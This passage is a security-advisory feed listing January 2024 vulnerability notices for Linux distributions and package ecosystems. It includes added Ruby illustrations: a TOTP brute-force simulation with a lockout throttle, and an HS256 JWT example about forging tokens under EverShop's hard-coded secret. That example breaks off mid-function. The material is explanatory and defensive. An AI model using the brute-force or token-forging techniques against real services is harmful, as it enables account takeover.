12.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0130] frr security update (moderate) | [7.5.1-13.3] - Resolves: RHEL-15916 - Flowspec overflow in bgpd/bgp_flowspec.c - Resolves: RHEL-15919 - Out of bounds read in bgpd/bgp_label.c - Resolves: RHEL-15869 - crash from specially crafted MP_UNREACH_NLRI-containing BGP UPDATE message - Resolves: RHEL-15868 - crash from malformed EOR-containing BGP UPDATE message | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0130
12.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0156] .NET 6.0 security update (important) | [6.0.126-1.0.1] - Add support for Oracle Linux [6.0.126-1] - Update to .NET SDK 6.0.126 and Runtime 6.0.26 [6.0.125-1] - Update to .NET SDK 6.0.125 and Runtime 6.0.25 | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0156
11.01.2024 21:42:19almalinux[ALSA-2024:0155] gnutls security update (moderate)gnutls security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0155
12.01.2024 13:58:47almalinux[ALSA-2024:0119] libxml2 security update (moderate)libxml2 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0119
11.01.2024 22:31:01almalinux[ALSA-2024:0131] pixman security update (moderate)pixman security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0131
12.01.2024 14:11:15almalinux[ALSA-2024:0105] nss security update (moderate)nss security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0105
12.01.2024 00:26:04almalinux[ALSA-2024:0141] ipa security update (moderate)ipa security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0141
11.01.2024 21:02:02almalinux[ALSA-2024:0157] .NET 7.0 security update (important).NET 7.0 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0157
11.01.2024 22:16:03almalinux[ALSA-2024:0150] .NET 8.0 security update (important).NET 8.0 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0150
12.01.2024 00:19:35almalinux[ALSA-2024:0156] .NET 6.0 security update (important).NET 6.0 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0156
13.01.2024 01:22:11maven[MAVEN:GHSA-RWF9-8FQR-P44M] Qualys Jenkins Plugin for Policy Compliance Cross-site Scripting vulnerability (moderate)Qualys Jenkins Plugin for Policy Compliance prior to version and including 1.0.5 was identified to be affected by a security flaw, which was missing a permission check while performing a connectivity check to Qualys Cloud Services. This allowed any user with login access and access to configure or edit jobs to utilize the plugin to configure a potential rouge endpoint via which it was possible to control response for certain request which could be injected with XSS payloads leading to XSS while processing the response data.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RWF9-8FQR-P44M
13.01.2024 01:19:30npm[NPM:GHSA-G777-CRP9-M27G] Apprite CLI makes Use of Hard-coded Credentials (moderate)In Appwrite CLI before 3.0.0, when using the login command, the credentials of the Appwrite user are stored in a ~/.appwrite/prefs.json file with 0644 as UNIX permissions. Any user of the local system can access those credentials.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-G777-CRP9-M27G
12.01.2024 10:00:00 | msrc | [MS:CVE-2024-20666] BitLocker Security Feature Bypass Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20666
12.01.2024 10:00:00 | msrc | [MS:CVE-2024-20658] Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20658
12.01.2024 10:00:00 | msrc | [MS:CVE-2024-0056] Microsoft.Data.SqlClient and System.Data.SqlClient SQL Data Provider Security Feature Bypass Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0056
12.01.2024 10:00:00 | msrc | [MS:CVE-2024-0057] .NET, .NET Framework, and Visual Studio Security Feature Bypass Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0057
12.01.2024 10:00:00 | msrc | [MS:CVE-2024-21312] .NET Framework Denial of Service Vulnerability (important) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21312
13.01.2024 17:16:36 | rubysec | [RUBYSEC:DEVISE-TWO-FACTOR-2024-0227] Devise-Two-Factor vulnerable to brute force attacks (medium)

Devise-Two-Factor does not throttle or otherwise restrict login attempts at the server by default. When combined with the Time-based One Time Password algorithm's (TOTP) inherent entropy limitations, it's possible for an attacker to bypass the 2FA mechanism through brute-force attacks.

### Impact

If a user's username and password have already been compromised, an attacker would be able to try possible TOTP codes and see if they can hit a lucky collision to log in as that user. The user under attack would not necessarily know that their account has been compromised.

### Patches

Devise-Two-Factor has not released any fixes for this vulnerability. This library is open-ended by design and cannot solve this for all applications natively. It's recommended that any application leveraging Devise-Two-Factor implement controls at the application level to mitigate this threat. A non-exhaustive list of possible mitigations can be found below.

#### Mitigations

1. Use the `lockable` strategy from Devise to lock a user after a certain number of failed login attempts. See https://www.rubydoc.info/github/heartcombo/devise/main/Devise/Models/Lockable for more information.
2. Configure a rate limit for your application, especially on the endpoints used to log in. One such library to accomplish this is [rack-attack](https://rubygems.org/gems/rack-attack).
3. When displaying authentication errors, hide whether validating a username/password combination failed or a two-factor code failed behind a more generic error message.

### Acknowledgements

Christian Reitter ([Radically Open Security](https://www.radicallyopensecurity.com/)) and Chris MacNaughton ([Centauri Solutions](https://centauri.solutions))

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DEVISE-TWO-FACTOR-2024-0227

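The Devise-Two-Factor advisory gives the reasoning but not the numbers. The Ruby script below is an added illustration, not part of the advisory and not Devise-Two-Factor's code: it works out the collision probability for 6-digit TOTP codes and models mitigations 1 and 3 (a per-account failure counter with lockout, and a single generic result for every wrong code). The drift window of three simultaneously valid codes (`VALID_CODES`), the lockout threshold of five failures, the class and method names and the victim address are assumptions of the example, not Devise defaults or API.

```ruby
require 'securerandom'

# Assumptions for this illustration: 6-digit codes and a drift window in
# which the current 30-second step plus one step either side is accepted,
# so 3 codes are valid at any moment. Set VALID_CODES to whatever your
# application's drift setting actually allows.
TOTP_DIGITS = 6
VALID_CODES = 3
CODE_SPACE  = 10**TOTP_DIGITS

# Probability that a single random guess is accepted.
def guess_success_probability(valid_codes: VALID_CODES, code_space: CODE_SPACE)
  valid_codes.to_f / code_space
end

# Probability that at least one of `attempts` random guesses is accepted.
def cumulative_success_probability(attempts, valid_codes: VALID_CODES, code_space: CODE_SPACE)
  1.0 - (1.0 - guess_success_probability(valid_codes: valid_codes, code_space: code_space))**attempts
end

# Number of guesses needed to reach `target` probability of success.
def attempts_for_probability(target, valid_codes: VALID_CODES, code_space: CODE_SPACE)
  p = guess_success_probability(valid_codes: valid_codes, code_space: code_space)
  (Math.log(1.0 - target) / Math.log(1.0 - p)).ceil
end

# Mitigations 1 and 3 in miniature: count consecutive failed second-factor
# attempts per account, lock the account after `max_failures`, and return
# the same generic :invalid for any wrong code. In-memory and illustrative;
# this is not Devise's `lockable` implementation.
class SecondFactorThrottle
  LockedOut = Class.new(StandardError)

  def initialize(max_failures: 5, lock_seconds: 600, clock: -> { Time.now })
    @max_failures = max_failures
    @lock_seconds = lock_seconds
    @clock = clock
    @state = Hash.new { |h, k| h[k] = { failures: 0, locked_until: nil } }
  end

  def locked?(account)
    locked_until = @state[account][:locked_until]
    !locked_until.nil? && @clock.call < locked_until
  end

  # `verifier` receives the submitted code and returns true if it is correct.
  def attempt(account, code, &verifier)
    raise LockedOut, 'account temporarily locked' if locked?(account)

    st = @state[account]
    if verifier.call(code)
      st[:failures] = 0
      st[:locked_until] = nil
      :ok
    else
      st[:failures] += 1
      st[:locked_until] = @clock.call + @lock_seconds if st[:failures] >= @max_failures
      :invalid
    end
  end
end

# Attacker who already has the password and guesses random codes against
# the throttle. Returns the number of guesses that were actually evaluated
# before the lockout stopped the attack (or before a lucky hit).
def simulate_brute_force(true_code:, max_failures: 5, guesses: 1_000)
  throttle = SecondFactorThrottle.new(max_failures: max_failures)
  evaluated = 0
  guesses.times do
    guess = format("%0#{TOTP_DIGITS}d", SecureRandom.random_number(CODE_SPACE))
    result = throttle.attempt('victim@example.test', guess) { |c| c == true_code }
    evaluated += 1
    return evaluated if result == :ok
  end
  evaluated
rescue SecondFactorThrottle::LockedOut
  evaluated
end

if __FILE__ == $PROGRAM_NAME
  puts "per-guess success probability:           #{guess_success_probability}"
  puts "guesses for a 50% chance, no throttling: #{attempts_for_probability(0.5)}"
  puts "success probability with only 5 guesses: #{cumulative_success_probability(5)}"
  puts "guesses evaluated before lockout:        #{simulate_brute_force(true_code: '123456')}"
end
```

With three valid codes per step, an unthrottled attacker reaches a 50% chance of a hit after roughly 231,000 guesses, which is minutes of work against an endpoint that answers quickly; capped at five guesses per lockout the same attacker's chance per lockout window drops to about 1.5e-5. Note that lockout alone turns the brute force into a denial of service against the victim, which is why the advisory pairs it with a rate limit such as rack-attack on the login endpoints.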
14.01.2024 02:00:00 | gentoo | [GLSA-202401-17] libgit2: Privilege Escalation Vulnerability (normal) | A vulnerability has been found in libgit2 which could result in privilege escalation. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-17
14.01.2024 05:38:29 | rustsec | [RUSTSEC-2024-0001] Unsound use of str::from_utf8_unchecked on bytes which are not UTF-8

Affected versions receive a `&[u8]` from the caller through a safe API, and pass it directly to the unsafe `str::from_utf8_unchecked` function. The behavior of `ferris_says::say` is undefined if the bytes from the caller don't happen to be valid UTF-8.

The flaw was corrected in [ferris-says#21] by using the safe `str::from_utf8` instead, and returning an error on invalid input. However this fix has not yet been published to crates.io as a patch version for 0.2.

Separately, [ferris-says#32] has introduced a different API for version 0.3 which accepts input as `&str` rather than `&[u8]`, so is unaffected by this bug.

[ferris-says#21]: https://github.com/rust-lang/ferris-says/pull/21
[ferris-says#32]: https://github.com/rust-lang/ferris-says/pull/32

https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0001

15.01.2024 20:31:03 | ubuntu | [USN-6585-1] libssh2 vulnerability (medium) | libssh2 could be made to expose sensitive information over the network. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6585-1
15.01.2024 19:17:57 | ubuntu | [USN-6584-1] Libspf2 vulnerabilities (critical) | Several security issues were fixed in Libspf2. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6584-1
15.01.2024 17:23:32 | ubuntu | [USN-6583-1] MySQL vulnerabilities (medium) | Several security issues were fixed in MySQL. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6583-1
15.01.2024 15:52:06 | ubuntu | [USN-6582-1] WebKitGTK vulnerability (medium) | Several security issues were fixed in WebKitGTK. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6582-1
15.01.2024 13:57:53 | ubuntu | [USN-6581-1] GNU binutils vulnerabilities (high) | Several security issues were fixed in GNU binutils. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6581-1
15.01.2024 13:45:46 | ubuntu | [USN-6580-1] w3m vulnerability (medium) | w3m could be made to crash or run programs as your login if it opened a malicious website. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6580-1
15.01.2024 02:00:00 | gentoo | [GLSA-202401-18] zlib: Buffer Overflow (high) | A vulnerability has been found in zlib that can lead to a heap-based buffer overflow. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-18
15.01.2024 02:00:00 | gentoo | [GLSA-202401-19] Opera: Multiple Vulnerabilities (normal) | Multiple vulnerabilities have been found in Opera, the worst of which can lead to remote code execution. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-19
15.01.2024 02:00:00 | gentoo | [GLSA-202401-20] QPDF: Buffer Overflow (normal) | A vulnerability has been found in QPDF which can lead to a heap-based buffer overflow. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-20
15.01.2024 02:00:00 | gentoo | [GLSA-202401-21] KTextEditor: Arbitrary Local Code Execution (normal) | A vulnerability has been found in KTextEditor where local code can be executed without user interaction. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-21
15.01.2024 02:00:00 | gentoo | [GLSA-202401-22] libspf2: Multiple vulnerabilities (normal) | Multiple vulnerabilities have been discovered in libspf2, the worst of which can lead to remote code execution. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-22
15.01.2024 02:00:00 | redhat | [RHSA-2024:0253] sqlite security update (moderate)

SQLite is a C library that implements an SQL database engine. A large subset of SQL92 is supported. A complete database is stored in a single disk file. The API is designed for convenience and ease of use. Applications that link against SQLite can enjoy the power and flexibility of an SQL database without the administrative hassles of supporting a separate database server.

Security Fix(es):

* sqlite: heap-buffer-overflow at sessionfuzz (CVE-2023-7104)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0253

15.01.2024 02:00:00 | redhat | [RHSA-2024:0256] python3 security update (moderate)

Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.

Security Fix(es):

* python: Parsing errors in email/_parseaddr.py lead to incorrect value in email address part of tuple (CVE-2023-27043)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0256

16.01.2024 22:56:51 | slackware | [SSA:2024-016-02] xorg-server

New xorg-server packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/xorg-server-1.20.14-i586-11_slack15.0.txz: Rebuilt.
  This update fixes security issues:
  Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer.
  Reattaching to different master device may lead to out-of-bounds memory access.
  Heap buffer overflow in XISendDeviceHierarchyEvent.
  Heap buffer overflow in DisableDevice.
  SELinux context corruption.
  SELinux unlabeled GLX PBuffer.
  For more information, see:
    https://lists.x.org/archives/xorg/2024-January/061525.html
    https://www.cve.org/CVERecord?id=CVE-2023-6816
    https://www.cve.org/CVERecord?id=CVE-2024-0229
    https://www.cve.org/CVERecord?id=CVE-2024-21885
    https://www.cve.org/CVERecord?id=CVE-2024-21886
    https://www.cve.org/CVERecord?id=CVE-2024-0408
    https://www.cve.org/CVERecord?id=CVE-2024-0409
  (* Security fix *)
patches/packages/xorg-server-xephyr-1.20.14-i586-11_slack15.0.txz: Rebuilt.
patches/packages/xorg-server-xnest-1.20.14-i586-11_slack15.0.txz: Rebuilt.
patches/packages/xorg-server-xvfb-1.20.14-i586-11_slack15.0.txz: Rebuilt.
patches/packages/xorg-server-xwayland-21.1.4-i586-10_slack15.0.txz: Rebuilt.
  This update fixes security issues:
  Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer.
  Reattaching to different master device may lead to out-of-bounds memory access.
  Heap buffer overflow in XISendDeviceHierarchyEvent.
  Heap buffer overflow in DisableDevice.
  SELinux unlabeled GLX PBuffer.
  For more information, see:
    https://lists.x.org/archives/xorg/2024-January/061525.html
    https://www.cve.org/CVERecord?id=CVE-2023-6816
    https://www.cve.org/CVERecord?id=CVE-2024-0229
    https://www.cve.org/CVERecord?id=CVE-2024-21885
    https://www.cve.org/CVERecord?id=CVE-2024-21886
    https://www.cve.org/CVERecord?id=CVE-2024-0408
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated packages for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-1.20.14-i586-11_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xephyr-1.20.14-i586-11_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xnest-1.20.14-i586-11_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xvfb-1.20.14-i586-11_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xwayland-21.1.4-i586-10_slack15.0.txz

Updated packages for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-1.20.14-x86_64-11_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xephyr-1.20.14-x86_64-11_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xnest-1.20.14-x86_64-11_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xvfb-1.20.14-x86_64-11_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xwayland-21.1.4-x86_64-10_slack15.0.txz

Updated packages for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-21.1.11-i586-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xephyr-21.1.11-i586-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xnest-21.1.11-i586-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xvfb-21.1.11-i586-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xwayland-23.2.4-i586-1.txz

Updated packages for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-21.1.11-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xephyr-21.1.11-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xnest-21.1.11-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xvfb-21.1.11-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xwayland-23.2.4-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 packages:
cbfc1d90a9b15381b3fde1cc05d3393a  xorg-server-1.20.14-i586-11_slack15.0.txz
13e01fa593096111f41c8de08b1bd407  xorg-server-xephyr-1.20.14-i586-11_slack15.0.txz
f81a8f96742881f732e3784ceefe42aa  xorg-server-xnest-1.20.14-i586-11_slack15.0.txz
b223aa9470870a7f231d251597501605  xorg-server-xvfb-1.20.14-i586-11_slack15.0.txz
5a6593bafecb4f43f4404b31c959a91c  xorg-server-xwayland-21.1.4-i586-10_slack15.0.txz

Slackware x86_64 15.0 packages:
cc3ae53ea9b14335b608a485344aae01  xorg-server-1.20.14-x86_64-11_slack15.0.txz
d52148237c62011adceaba103458718c  xorg-server-xephyr-1.20.14-x86_64-11_slack15.0.txz
27c8dad2969a0551dadc1bdbc0a76b74  xorg-server-xnest-1.20.14-x86_64-11_slack15.0.txz
a9b04919e14289a4e10e1c361ba8c96c  xorg-server-xvfb-1.20.14-x86_64-11_slack15.0.txz
8ed1857f20c19679edc79a6d4ce9a58d  xorg-server-xwayland-21.1.4-x86_64-10_slack15.0.txz

Slackware -current packages:
d795fb2800b568f72e805652319a5bb9  x/xorg-server-21.1.11-i586-1.txz
b05c18e825d04e6a1b477b1da9dbc85c  x/xorg-server-xephyr-21.1.11-i586-1.txz
01cde17a95b6664d99f65e35eb4a143c  x/xorg-server-xnest-21.1.11-i586-1.txz
369134fd6e429782098a13b5fdebe3bf  x/xorg-server-xvfb-21.1.11-i586-1.txz
088af0fe9440910f53cbb0c5f1534260  x/xorg-server-xwayland-23.2.4-i586-1.txz

Slackware x86_64 -current packages:
5e206bee3b5bd7984be71dc0d4f3bf95  x/xorg-server-21.1.11-x86_64-1.txz
1350d0aa457d88076e59869b7f987382  x/xorg-server-xephyr-21.1.11-x86_64-1.txz
9b3b568a4a59cabe5571efdf08a279b6  x/xorg-server-xnest-21.1.11-x86_64-1.txz
a197b434af664928dd02f9cef6ae1f9a  x/xorg-server-xvfb-21.1.11-x86_64-1.txz
6f0c97a807cc2d14d3eb36b22e5f17e0  x/xorg-server-xwayland-23.2.4-x86_64-1.txz

**Installation instructions**

Upgrade the packages as root:
`# upgradepkg xorg-server-*.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-016-02

16.01.2024 22:56:31 | slackware | [SSA:2024-016-01] gnutls (medium)

New gnutls packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/gnutls-3.8.3-i586-1_slack15.0.txz: Upgraded.
  This update fixes two medium severity security issues:
  Fix more timing side-channel inside RSA-PSK key exchange.
  Fix assertion failure when verifying a certificate chain with a cycle of cross signatures.
  For more information, see:
    https://www.cve.org/CVERecord?id=CVE-2024-0553
    https://www.cve.org/CVERecord?id=CVE-2024-0567
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/gnutls-3.8.3-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/gnutls-3.8.3-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/gnutls-3.8.3-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/gnutls-3.8.3-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
883c919c39e4003d280aa7a7ce96fa6c  gnutls-3.8.3-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
f87ab044e8b0e5e3badb1e93947abc80  gnutls-3.8.3-x86_64-1_slack15.0.txz

Slackware -current package:
09f41babc753a0b69ec3ae25804111ed  n/gnutls-3.8.3-i586-1.txz

Slackware x86_64 -current package:
370bcaa3e93e54fe6cf135161261e5a4  n/gnutls-3.8.3-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg gnutls-3.8.3-i586-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-016-01

16.01.2024 17:24:42 | npm | [NPM:GHSA-62JR-84GF-WMG4] Default swagger-ui configuration exposes all files in the module (moderate)

### Impact

The default configuration of `@fastify/swagger-ui` without `baseDir` set will lead to all files in the module's directory being exposed via http routes served by the module.

### Patches

Update to v2.1.0

### Workarounds

Use the `baseDir` option

### References

[HackerOne report](https://hackerone.com/reports/2312369).

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-62JR-84GF-WMG4

16.01.2024 17:20:09 | ubuntu | [USN-6587-1] X.Org X Server vulnerabilities | Several security issues were fixed in X.Org X Server. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6587-1
16.01.2024 16:46:02 | ubuntu | [USN-6559-1] ZooKeeper vulnerabilities (critical) | Several security issues were fixed in ZooKeeper. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6559-1
16.01.2024 14:44:38 | ubuntu | [USN-6586-1] FreeImage vulnerabilities (high) | Several security issues were fixed in FreeImage. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6586-1
16.01.2024 14:15:24 | ubuntu | [USN-6579-2] Xerces-C++ vulnerability (high) | Xerces-C++ could be made to crash or run programs if it opened a specially crafted file. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6579-2
16.01.2024 02:00:00 | cisa | [CISA-2024:0116] CISA Adds One Known Exploited Vulnerability to Catalog (high) | CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. | https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0116
16.01.2024 02:00:00 | gentoo | [GLSA-202401-23] libuv: Buffer Overread (low) | A buffer overread vulnerability has been found in libuv. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-23
16.01.2024 02:00:00 | gentoo | [GLSA-202401-24] Nettle: Denial of Service (normal) | Multiple denial of service vulnerabilities have been discovered in Nettle. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-24
16.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0253] sqlite security update (moderate) | [3.26.0-19.0.1] - Fixed CVE-2023-7104 | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0253
16.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0256] python3 security update (moderate) | [3.6.8-56.0.1.3] - Security fix for CVE-2023-27043. Resolves: rhbz#2196183 | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0256
16.01.2024 02:00:00 | vmware | [VMSA-2024-0001] VMware Aria Automation (formerly vRealize Automation) updates address a Missing Access Control vulnerability (CVE-2023-34063) (critical) | | https://secdb.nttzen.cloud/security-advisory/vmware/VMSA-2024-0001
16.01.2024 22:45:55 | maven | [MAVEN:GHSA-RXGG-273W-RFW7] Remote Code Execution vulnerability in Apache IoTDB via UDF (moderate) | Remote Code Execution vulnerability in Apache IoTDB. This issue affects Apache IoTDB: from 1.0.0 through 1.2.2. Users are recommended to upgrade to version 1.3.0, which fixes the issue. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RXGG-273W-RFW7
16.01.2024 22:34:50 | maven | [MAVEN:GHSA-JC7H-C423-MPJC] Apache Shiro vulnerable to path traversal (moderate) | Apache Shiro before 1.13.0 or 2.0.0-alpha-4 may be susceptible to a path traversal attack that results in an authentication bypass when used together with path rewriting. Mitigation: update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+, or ensure `blockSemicolon` is enabled (this is the default). | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JC7H-C423-MPJC
16.01.2024 22:36:50 | maven | [MAVEN:GHSA-GG7W-PW2R-X2CQ] Apache Solr allows read access to host environment variables (moderate)

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Solr.

The Solr Metrics API publishes all unprotected environment variables available to each Apache Solr instance. Users are able to specify which environment variables to hide; however, the default list is designed to work for known secret Java system properties. Environment variables cannot be strictly defined in Solr, like Java system properties can be, and may be set for the entire host, unlike Java system properties, which are set per Java process.

The Solr Metrics API is protected by the "metrics-read" permission. Therefore, Solr Clouds with Authorization set up will only be vulnerable via users with the "metrics-read" permission.

This issue affects Apache Solr: from 9.0.0 before 9.3.0.

Users are recommended to upgrade to version 9.3.0 or later, in which environment variables are not published via the Metrics API.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-GG7W-PW2R-X2CQ

16.01.2024 18:37:01 | npm | [NPM:GHSA-GGPM-9QFX-MHWG] EverShop vulnerable to improper authorization in GraphQL endpoints (moderate) | Lack of authentication in NPM's package @evershop/evershop before version 1.0.0-rc.9 allows remote attackers to obtain sensitive information via improper authorization in GraphQL endpoints. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GGPM-9QFX-MHWG
16.01.2024 18:36:49 | npm | [NPM:GHSA-32R3-57HP-CGFW] EverShop at risk to unauthorized access via weak HMAC secret (high) | An issue was discovered in NPM's package @evershop/evershop before version 1.0.0-rc.9. The HMAC secret used for generating tokens is hardcoded as "secret". A weak HMAC secret poses a risk because attackers can use the predictable secret to create valid JSON Web Tokens (JWTs), allowing them access to important information and actions within the application. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-32R3-57HP-CGFW
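To make concrete why a hard-coded HMAC secret is equivalent to no signature at all, here is an added Ruby example. It is not EverShop's code: the claim names `sub` and `role`, the candidate-secret list, the 32-byte minimum and every helper name are assumptions of the example. It implements HS256 signing and verification directly over `OpenSSL::HMAC`, shows an attacker minting an accepted token by trying the known default value `"secret"`, and shows the two server-side fixes a reviewer would ask for: refuse to start with a weak or well-known secret, and compare signatures in constant time while accepting only the algorithm the server itself uses.

```ruby
require 'openssl'
require 'json'
require 'securerandom'

# The hard-coded value named in the advisory.
WEAK_DEFAULT_SECRET = 'secret'

# Base64url without padding, as JWT requires (RFC 7515 section 2).
def b64url_encode(bytes)
  [bytes].pack('m0').tr('+/', '-_').delete('=')
end

def b64url_decode(str)
  padded = str.tr('-_', '+/')
  padded += '=' * ((4 - padded.length % 4) % 4)
  padded.unpack1('m0')
end

# Constant-time comparison so a verifier does not leak how many signature
# bytes matched. (OpenSSL.fixed_length_secure_compare does the same on
# recent Ruby; written out here so the example has no version dependency.)
def constant_time_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

def hs256_sign(payload, secret)
  header = { alg: 'HS256', typ: 'JWT' }
  signing_input = "#{b64url_encode(JSON.generate(header))}.#{b64url_encode(JSON.generate(payload))}"
  signature = OpenSSL::HMAC.digest('SHA256', secret, signing_input)
  "#{signing_input}.#{b64url_encode(signature)}"
end

# Returns the payload Hash if `token` verifies under `secret`, else nil.
# Only HS256 is accepted; a token advertising any other alg is rejected
# outright rather than trusted to pick the verification method.
def hs256_verify(token, secret)
  h, p, s = token.split('.', 3)
  return nil if h.nil? || p.nil? || s.nil?
  header = JSON.parse(b64url_decode(h))
  return nil unless header.is_a?(Hash) && header['alg'] == 'HS256'
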